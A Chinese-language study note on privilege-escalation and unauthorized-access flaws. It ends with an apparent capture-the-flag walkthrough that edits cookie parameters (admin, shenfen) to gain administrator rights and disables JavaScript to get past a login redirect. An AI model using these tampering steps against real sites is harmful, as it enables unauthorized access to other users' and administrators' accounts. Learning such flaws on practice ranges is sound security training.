知识梳理
1. 越权漏洞的概念
越权漏洞是一种很常见的逻辑安全漏洞。是由于服务器端对客户提出的数据操作请求过分信任,忽略了对该用户操作权限的判定,导致修改相关参数就可以拥有了其他账户的增、删、查、改功能,从而导致越权漏洞。
2. 越权漏洞分类
- 水平(平行)越权: 在同一权限下的越权,比如越权操作其他同权限用户
- 垂直越权: 权限低的可以访问到权限高的,比如越权操作管理员
- 交叉越权:既可以水平,又可以垂直
3. 常见越权出现位置
- 修改资料时修改id
- 订单里遍历订单id
- 修改密码时修改id,user,修改他人密码
- Id,user这类身份标识类的参数可能可以越权
4. 未授权访问
未授权访问是,输入正确地址后可以直接访问(不需要任何权限),而越权需要去修改参数去执行(需要低权限)
5. 常见未授权访问出现位置
- 网页后台页面
- 某些后期开发的页面
- 扫描路径,直接去访问敏感目录也许就可以直接访问到后台
6. 常见的越权漏洞
靶场地址
http://59.63.200.79:8002/d/index.asp
-
创建普通账号

image
-
进行抓包

image
Cookie: ASPSESSIONIDCCBACBST=EKEHFPIACKBCDCFCJAFPEMFB; BWSsoft%5F2010=phone=zzz&admin=0&realname=zzz&dlcs=2&username=zzz&bumen=zzz&loginname=zzz&danwei=zzz&shenfen=2&UserID=23
Upgrade-Insecure-Requests: 1zhi
发现在Cookie内存在多出传参,尝试修改传参猜测传参含义
- username ==》 昵称
- realname ==》 姓名
- dlcs ==》 登陆次数
- shenfen ==》 前端身份
- admin ==》 后端身份

image
-
利用插件修改cookie,成为前台管理员
phone=zzz&admin=0&realname=zzz&dlcs=3&username=zzz&bumen=zzz&loginname=zzz&danwei=zzz&shenfen=1&UserID=23

image
-
利用插件修改cookie,成为前台/后台管理员
phone=zzz&admin=1&realname=zzz&dlcs=3&username=zzz&bumen=zzz&loginname=zzz&danwei=zzz&shenfen=1&UserID=23

image
-
找到flag{yuequan_good!@}
image

image
该网站还存在未授权访问
-
直接空密码进行登陆

image
-
发现页面使用js进行跳转
<script>alert('用户名和密码不得为空! ');location.replace('index.asp')</script>
-
禁用js后能直接访问

image

image